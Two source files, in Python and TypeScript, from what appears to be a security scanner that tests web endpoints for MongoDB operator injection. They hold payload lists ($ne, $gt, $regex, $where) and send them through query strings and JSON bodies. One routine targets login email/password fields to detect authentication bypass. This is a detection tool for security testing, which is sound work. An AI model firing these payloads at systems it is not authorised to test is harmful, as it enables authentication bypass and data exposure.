File: numasec/scanners/nosql_tester.py
"""Python-native NoSQL Injection tester (MongoDB operator injection).

Detects endpoints vulnerable to MongoDB operator injection by substituting
query parameter values with MongoDB query operators:

1. ``{"$ne": null}`` — always-true inequality operator
2. ``{"$gt": ""}`` — greater-than empty string
3. ``{"$regex": ".*"}`` — match-all regular expression
4. ``[$ne]=1`` — PHP/Node.js bracket-notation variant
5. ``[%24gt]=`` — URL-encoded operator variant

Two injection channels are tested per parameter:
- GET request with URL-encoded operator payload in the query string
- POST request with JSON body containing the operator payload

Vulnerability is inferred by comparing response content and length
against a baseline response, or by detecting MongoDB-specific error
keywords in the response body.
"""

from __future__ import annotations

import json
import logging
import time
from dataclasses import dataclass, field
from typing import Any
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

import httpx

from numasec.core.http import create_client

logger = logging.getLogger("numasec.scanners.nosql_tester")

# ---------------------------------------------------------------------------
# Payloads and detection keywords
# ---------------------------------------------------------------------------

_NOSQL_PAYLOADS: list[str] = [
    '{"$gt": ""}',
    '{"$ne": null}',
    '{"$regex": ".*"}',
    "[$ne]=1",
    "[%24gt]=",
]

_NOSQL_SUCCESS_INDICATORS: list[str] = [
    "welcome",
    "dashboard",
    "logged in",
    "success",
    "admin",
    "user",
]

_NOSQL_ERROR_INDICATORS: list[str] = [
    "bson",
    "objectid",
    "mongodb",
    "mongo",
    "castError",
    "cast error",
]

# Minimum character difference vs. baseline that suggests altered query results
_LENGTH_DIFF_THRESHOLD = 200


# ---------------------------------------------------------------------------
# Data models
# ---------------------------------------------------------------------------


@dataclass
class NoSqlVulnerability:
    """A single NoSQL injection finding."""

    parameter: str
    payload: str
    evidence: str
    severity: str = "high"
    confidence: float = 0.5


@dataclass
class NoSqlResult:
    """Complete NoSQL injection test result."""

    target: str
    vulnerable: bool = False
    vulnerabilities: list[NoSqlVulnerability] = field(default_factory=list)
    duration_ms: float = 0.0

    def to_dict(self) -> dict[str, Any]:
        """Serialise to JSON-friendly dict."""
        return {
            "target": self.target,
            "vulnerable": self.vulnerable,
            "vulnerabilities": [
                {
                    "parameter": v.parameter,
                    "payload": v.payload,
                    "evidence": v.evidence,
                    "severity": v.severity,
                    "confidence": v.confidence,
                }
                for v in self.vulnerabilities
            ],
            "duration_ms": round(self.duration_ms, 2),
            "summary": (
                f"{len(self.vulnerabilities)} NoSQL injection "
                f"{'vulnerability' if len(self.vulnerabilities) == 1 else 'vulnerabilities'} found"
                if self.vulnerabilities
                else "No NoSQL injection found"
            ),
            "next_steps": (
                ["Test auth bypass via operator injection on login endpoint"] if self.vulnerabilities else []
            ),
        }


# ---------------------------------------------------------------------------
# NoSQL injection detection engine
# ---------------------------------------------------------------------------


class NoSqlTester:
    """Multi-payload NoSQL injection detector.

    Parameters
    ----------
    timeout:
        HTTP request timeout in seconds.
    """

    def __init__(self, timeout: float = 10.0, extra_headers: dict[str, str] | None = None) -> None:
        self.timeout = timeout
        self._extra_headers: dict[str, str] = extra_headers or {}

    async def test(self, url: str, method: str = "GET") -> NoSqlResult:
        """Run NoSQL injection tests against a target URL.

        Obtains a baseline response, then for each query parameter injects
        MongoDB operator payloads via GET and POST and compares results.
        When no query parameters exist but ``method`` is POST, probes
        the endpoint with JSON operator payloads directly.

        Args:
            url: Target URL to test.
            method: HTTP method hint — ``"GET"`` or ``"POST"``.

        Returns:
            ``NoSqlResult`` with all discovered NoSQL injection vulnerabilities.
        """
        start = time.monotonic()
        result = NoSqlResult(target=url)

        parsed = urlparse(url)
        params = parse_qs(parsed.query, keep_blank_values=True)

        async with create_client(
            timeout=self.timeout,
            headers=self._extra_headers,
        ) as client:
            if not params:
                logger.debug("No query parameters — skipping GET probes, trying POST JSON for %s", url)
                # Still try POST JSON injection (e.g., MongoDB $ne operator bypass on login endpoints)
                await self._probe_post_json(client, url, result)
                result.duration_ms = (time.monotonic() - start) * 1000
                if result.vulnerabilities:
                    logger.info(
                        "NoSQL test complete: %s — %d vulns, %.0fms",
                        url,
                        len(result.vulnerabilities),
                        result.duration_ms,
                    )
                return result

            # Obtain baseline response
            baseline_text = await self._get_baseline(client, url)

            for param_name in params:
                try:
                    for payload in _NOSQL_PAYLOADS:
                        # GET probe: URL-encoded payload in query string
                        vuln = await self._probe_get(client, parsed, params, param_name, payload, baseline_text)
                        if vuln:
                            result.vulnerabilities.append(vuln)
                            result.vulnerable = True
                            continue  # skip POST probe for same param/payload

                        # POST probe: JSON body with operator object
                        vuln = await self._probe_post(client, url, param_name, baseline_text)
                        if vuln:
                            result.vulnerabilities.append(vuln)
                            result.vulnerable = True
                except Exception as exc:
                    logger.warning("NoSQL test error on param %s: %s", param_name, exc)
                    continue

        result.duration_ms = (time.monotonic() - start) * 1000
        logger.info(
            "NoSQL test complete: %s — %d vulns, %.0fms",
            url,
            len(result.vulnerabilities),
            result.duration_ms,
        )
        return result

    async def _get_baseline(self, client: httpx.AsyncClient, url: str) -> str:
        """Fetch the original URL and return response text (empty string on error)."""
        try:
            resp = await client.get(url)
            return resp.text
        except httpx.HTTPError:
            return ""

    async def _probe_get(
        self,
        client: httpx.AsyncClient,
        parsed: Any,
        params: dict[str, list[str]],
        param_name: str,
        payload: str,
        baseline_text: str,
    ) -> NoSqlVulnerability | None:
        """Inject payload via GET query string and compare with baseline."""
        modified_params = dict(params)
        modified_params[param_name] = [payload]
        new_query = urlencode(modified_params, doseq=True)
        modified_url = urlunparse(parsed._replace(query=new_query))

        try:
            resp = await client.get(modified_url)
        except httpx.HTTPError as exc:
            logger.debug(
                "NoSQL GET probe error (param=%s, payload=%s): %s",
                param_name,
                payload,
                exc,
            )
            return None

        return self._evaluate_response(resp.text, baseline_text, param_name, payload, "GET")

    async def _probe_post(
        self,
        client: httpx.AsyncClient,
        url: str,
        param_name: str,
        baseline_text: str,
    ) -> NoSqlVulnerability | None:
        """Inject ``{"$ne": null}`` operator via POST JSON body."""
        payload = '{"$ne": null}'
        json_body = {param_name: {"$ne": None}}

        try:
            resp = await client.post(url, json=json_body)
        except httpx.HTTPError as exc:
            logger.debug(
                "NoSQL POST probe error (param=%s): %s",
                param_name,
                exc,
            )
            return None

        return self._evaluate_response(resp.text, baseline_text, param_name, payload, "POST JSON")

    async def _probe_post_json(
        self,
        client: httpx.AsyncClient,
        url: str,
        result: NoSqlResult,
    ) -> None:
        """Inject NoSQL operator payloads via POST JSON body (no query params needed).

        Targets authentication-style endpoints that accept ``{"email": ..., "password": ...}``
        or similar JSON bodies. Tries MongoDB operators like ``$ne``, ``$gt``, ``$regex``
        to bypass authentication.
        """
        # Get baseline: POST with normal credentials to establish a comparison
        baseline_text = ""
        try:
            baseline_resp = await client.post(
                url,
                json={"email": "baseline@test.com", "password": "baseline_wrong"},
            )
            baseline_text = baseline_resp.text
        except httpx.HTTPError:
            pass

        # Operator payloads for POST JSON injection
        operator_payloads: list[tuple[str, dict]] = [
            ('{"$ne": ""}', {"email": {"$ne": ""}, "password": {"$ne": ""}}),
            ('{"$gt": ""}', {"email": {"$gt": ""}, "password": {"$gt": ""}}),
            ('{"$regex": ".*"}', {"email": {"$regex": ".*"}, "password": {"$regex": ".*"}}),
            ('{"$ne": null}', {"email": {"$ne": None}, "password": {"$ne": None}}),
        ]

        for payload_desc, json_body in operator_payloads:
            try:
                resp = await client.post(url, json=json_body)
            except httpx.HTTPError as exc:
                logger.debug("NoSQL POST JSON probe error (payload=%s): %s", payload_desc, exc)
                continue

            vuln = self._evaluate_response(resp.text, baseline_text, "body", payload_desc, "POST JSON")
            if vuln:
                result.vulnerabilities.append(vuln)
                result.vulnerable = True
                return  # One confirmed finding is enough

    def _evaluate_response(
        self,
        response_text: str,
        baseline_text: str,
        param_name: str,
        payload: str,
        method: str,
    ) -> NoSqlVulnerability | None:
        """Compare response against baseline and check for NoSQL indicators.

        Three-tier detection:
        1. MongoDB error keywords — always flag (confirms NoSQL backend).
        2. Success indicators — only flag when the keyword is **new** compared
           to the baseline response (prevents false positives on endpoints that
           always return ``{"status": "success"}``).
        3. Significant response length change vs baseline.
        """
        body_lower = response_text.lower()
        baseline_lower = baseline_text.lower() if baseline_text else ""

        # Tier 1: MongoDB-specific error keywords (always flag)
        for error_kw in _NOSQL_ERROR_INDICATORS:
            if error_kw.lower() in body_lower:
                return NoSqlVulnerability(
                    parameter=param_name,
                    payload=payload,
                    evidence=(
                        f"NoSQL error keyword '{error_kw}' found in {method} response "
                        f"after injecting payload into parameter '{param_name}'."
                    ),
                    severity="high",
                    confidence=0.8,
                )

        # Tier 2: Success indicators — only flag when NEW vs baseline
        for success_kw in _NOSQL_SUCCESS_INDICATORS:
            kw_lower = success_kw.lower()
            if kw_lower in body_lower and kw_lower not in baseline_lower:
                return NoSqlVulnerability(
                    parameter=param_name,
                    payload=payload,
                    evidence=(
                        f"Success indicator '{success_kw}' appeared in {method} response "
                        f"after injecting NoSQL operator into parameter '{param_name}' "
                        f"(absent from baseline). Possible authentication bypass."
                    ),
                    severity="high",
                    confidence=0.6,
                )

        # Tier 3: Significant response length change vs baseline
        if baseline_text and abs(len(response_text) - len(baseline_text)) > _LENGTH_DIFF_THRESHOLD:
            return NoSqlVulnerability(
                parameter=param_name,
                payload=payload,
                evidence=(
                    f"Response length changed significantly ({len(baseline_text)} → "
                    f"{len(response_text)} chars, diff "
                    f"{abs(len(response_text) - len(baseline_text))}) "
                    f"after injecting NoSQL operator via {method} into '{param_name}'. "
                    f"Possible query logic alteration."
                ),
                severity="high",
                confidence=0.3,
            )

        return None


# ---------------------------------------------------------------------------
# Tool wrapper for ToolRegistry
# ---------------------------------------------------------------------------


async def python_nosql_test(url: str, method: str = "GET", headers: str = "") -> str:
    """Test a URL for NoSQL injection vulnerabilities (MongoDB operator injection).

    Injects MongoDB query operators via GET query string and POST JSON body.
    When no query parameters are present, probes the endpoint with POST JSON
    operator payloads directly (e.g., ``{"email": {"$ne": ""}}``).

    Args:
        url: Target URL to test.
        method: HTTP method hint — ``"GET"`` or ``"POST"``. Default: ``"GET"``.
        headers: Optional JSON string of extra HTTP headers for authenticated testing.

    Returns:
        JSON string with ``NoSqlResult`` data.
    """
    extra_headers = json.loads(headers) if headers else {}
    tester = NoSqlTester(extra_headers=extra_headers)
    result = await tester.test(url, method=method)
    return json.dumps(result.to_dict(), indent=2)

File: agent/packages/numasec/src/security/scanner/nosql-tester.ts
/**
 * Scanner: NoSQL injection tester
 *
 * Tests for MongoDB operator injection ($gt, $ne, $regex, $where)
 * in query parameters and JSON request bodies.
 */

import { httpRequest } from "../http-client"
import type { SessionID } from "../../session/schema"
import type { HttpRequestOptions, HttpResponse } from "../http-client"
import { assignJsonValue, collectJsonLeafPaths } from "./json-path"

export interface NoSqlResult {
  vulnerable: boolean
  findings: NoSqlFinding[]
  testedCount: number
}

export interface NoSqlFinding {
  parameter: string
  position: "query" | "body"
  payload: string
  evidence: string
  technique: string
}

// NoSQL operator payloads for query params (URL-encoded)
const QUERY_PAYLOADS: { payload: Record<string, string>; technique: string }[] = [
  { payload: { "[$ne]": "" }, technique: "not-equal bypass" },
  { payload: { "[$gt]": "" }, technique: "greater-than bypass" },
  { payload: { "[$regex]": ".*" }, technique: "regex bypass" },
  { payload: { "[$exists]": "true" }, technique: "exists operator" },
  { payload: { "[$in][]": "admin" }, technique: "in-array bypass" },
]

// NoSQL payloads for JSON body injection
const JSON_PAYLOADS: { payload: unknown; technique: string }[] = [
  { payload: { "$ne": "" }, technique: "not-equal operator" },
  { payload: { "$gt": "" }, technique: "greater-than operator" },
  { payload: { "$regex": ".*" }, technique: "regex operator" },
  { payload: { "$ne": null }, technique: "not-null operator" },
  { payload: { "$exists": true }, technique: "exists operator" },
  { payload: { "$where": "1==1" }, technique: "$where injection" },
]

// Indicators that suggest successful NoSQL injection
const SUCCESS_INDICATORS = [
  // Response suggests authentication bypass or data leak
  "token", "access_token", "jwt", "session", "logged in", "welcome",
  "dashboard", "profile", "admin",
]

const ERROR_INDICATORS = [
  // MongoDB/NoSQL error messages
  "mongoerror", "mongo", "bson", "operator", "castError",
  "invalid operator", "$where", "aggregate", "query",
]

interface NoSqlRequestOptions {
  method?: string
  headers?: Record<string, string>
  cookies?: string
  timeout: number
  sessionID?: SessionID | string
}

function requestOptions(
  config: NoSqlRequestOptions,
  body?: unknown,
): HttpRequestOptions {
  const headers = { ...(config.headers ?? {}) }
  const options: HttpRequestOptions = {
    method: config.method ?? (body === undefined ? "GET" : "POST"),
    headers,
    cookies: config.cookies,
    timeout: config.timeout,
    sessionID: config.sessionID,
  }
  if (body === undefined) return options
  options.body = JSON.stringify(body)
  if (options.method === "GET") options.method = "POST"
  if (!headers["Content-Type"] && !headers["content-type"]) {
    headers["Content-Type"] = "application/json"
  }
  return options
}

function count(input: string, token: string) {
  if (!token) return 0
  let total = 0
  let offset = 0
  while (true) {
    const index = input.indexOf(token, offset)
    if (index === -1) return total
    total++
    offset = index + token.length
  }
}

function indicator(body: string, baseline: string, list: string[]) {
  for (const item of list) {
    const key = item.toLowerCase()
    if (!body.includes(key)) continue
    if (count(body, key) <= count(baseline, key)) continue
    return item
  }
}

function changed(response: HttpResponse, baseline: HttpResponse) {
  if (response.status !== baseline.status) return true
  return response.body !== baseline.body
}

/**
 * Test a single parameter for NoSQL injection via query string.
 */
async function testQueryParam(
  url: string,
  parameter: string,
  baseline: HttpResponse,
  request: NoSqlRequestOptions,
  baseBody?: unknown,
): Promise<NoSqlFinding[]> {
  const findings: NoSqlFinding[] = []

  for (const { payload, technique } of QUERY_PAYLOADS) {
    const u = new URL(url)
    // Remove original param and add operator variant
    u.searchParams.delete(parameter)
    for (const [suffix, value] of Object.entries(payload)) {
      u.searchParams.set(`${parameter}${suffix}`, value)
    }

    const resp = await httpRequest(u.href, requestOptions(request, baseBody))

    // Check for authentication bypass (status changed from 401/403 to 200)
    if ((baseline.status === 401 || baseline.status === 403) && resp.status === 200) {
      findings.push({
        parameter,
        position: "query",
        payload: u.searchParams.toString(),
        evidence: `Status changed from ${baseline.status} to ${resp.status} — likely auth bypass`,
        technique,
      })
      continue
    }

    // Check for significant length difference (data leak)
    if (
      resp.status === 200 &&
      Math.abs(resp.body.length - baseline.body.length) > Math.max(32, baseline.body.length * 0.5)
    ) {
      findings.push({
        parameter,
        position: "query",
        payload: u.searchParams.toString(),
        evidence: `Response length changed significantly: ${baseline.body.length} → ${resp.body.length}`,
        technique,
      })
      continue
    }

    // Check for success indicators
    const lower = resp.body.toLowerCase()
    const success = indicator(lower, baseline.body.toLowerCase(), SUCCESS_INDICATORS)
    if (success && changed(resp, baseline) && !lower.includes("error")) {
      findings.push({
        parameter,
        position: "query",
        payload: u.searchParams.toString(),
        evidence: `Found new indicator "${success}" in response`,
        technique,
      })
      continue
    }

    // Check for error-based information leakage
    const error = indicator(lower, baseline.body.toLowerCase(), ERROR_INDICATORS)
    if (error && changed(resp, baseline)) {
      findings.push({
        parameter,
        position: "query",
        payload: u.searchParams.toString(),
        evidence: `NoSQL error indicator "${error}" in response`,
        technique: `error-based: ${technique}`,
      })
    }
  }

  return findings
}

/**
 * Test a parameter for NoSQL injection via JSON body.
 */
async function testJsonBody(
  url: string,
  parameter: string,
  baseBody: unknown,
  baseline: HttpResponse,
  request: NoSqlRequestOptions,
): Promise<NoSqlFinding[]> {
  const findings: NoSqlFinding[] = []

  for (const { payload, technique } of JSON_PAYLOADS) {
    const body = assignJsonValue(baseBody, parameter, payload)
    const resp = await httpRequest(url, requestOptions(request, body))

    // Auth bypass check
    if ((baseline.status === 401 || baseline.status === 403) && resp.status === 200) {
      findings.push({
        parameter,
        position: "body",
        payload: JSON.stringify(payload),
        evidence: `Status changed from ${baseline.status} to ${resp.status} — likely auth bypass`,
        technique,
      })
      continue
    }

    // Length difference
    if (
      resp.status === 200 &&
      Math.abs(resp.body.length - baseline.body.length) > Math.max(24, baseline.body.length * 0.3)
    ) {
      findings.push({
        parameter,
        position: "body",
        payload: JSON.stringify(payload),
        evidence: `Response length: ${baseline.body.length} → ${resp.body.length}`,
        technique,
      })
      continue
    }

    // Error indicators
    const lower = resp.body.toLowerCase()
    const error = indicator(lower, baseline.body.toLowerCase(), ERROR_INDICATORS)
    if (error && changed(resp, baseline)) {
      findings.push({
        parameter,
        position: "body",
        payload: JSON.stringify(payload),
        evidence: `NoSQL error: "${error}" in response`,
        technique: `error-based: ${technique}`,
      })
      continue
    }

    const success = indicator(lower, baseline.body.toLowerCase(), SUCCESS_INDICATORS)
    if (success && changed(resp, baseline) && !lower.includes("error")) {
      findings.push({
        parameter,
        position: "body",
        payload: JSON.stringify(payload),
        evidence: `Found new indicator "${success}" in response`,
        technique,
      })
    }
  }

  return findings
}

/**
 * Test URL parameters and JSON body for NoSQL injection.
 */
export async function testNoSql(
  url: string,
  options: {
    parameters?: string[]
    position?: "query" | "body" | "json"
    method?: string
    headers?: Record<string, string>
    cookies?: string
    jsonBody?: unknown
    timeout?: number
    sessionID?: SessionID | string
  } = {},
): Promise<NoSqlResult> {
  const { parameters, position, method, headers, cookies, jsonBody, timeout = 10_000, sessionID } = options
  let testedCount = 0
  const allFindings: NoSqlFinding[] = []
  const request: NoSqlRequestOptions = {
    method,
    headers,
    cookies,
    timeout,
    sessionID,
  }

  // Baseline request
  const baseline = await httpRequest(url, requestOptions(request, jsonBody))
  const wantQuery = !position || position === "query"
  const wantBody = position === "body" || position === "json" || !position

  // Test query parameters
  const parsedUrl = new URL(url)
  const queryParams = parameters ?? [...parsedUrl.searchParams.keys()]

  if (wantQuery) {
    for (const param of queryParams) {
      testedCount += QUERY_PAYLOADS.length
      const findings = await testQueryParam(url, param, baseline, request, jsonBody)
      allFindings.push(...findings)
    }
  }

  // Test JSON body
  const bodyParams = parameters ?? collectJsonLeafPaths(jsonBody)
  if (wantBody && jsonBody && typeof jsonBody === "object") {
    for (const param of bodyParams) {
      testedCount += JSON_PAYLOADS.length
      const findings = await testJsonBody(url, param, jsonBody, baseline, request)
      allFindings.push(...findings)
    }
  }

  return {
    vulnerable: allFindings.length > 0,
    findings: allFindings,
    testedCount,
  }
}
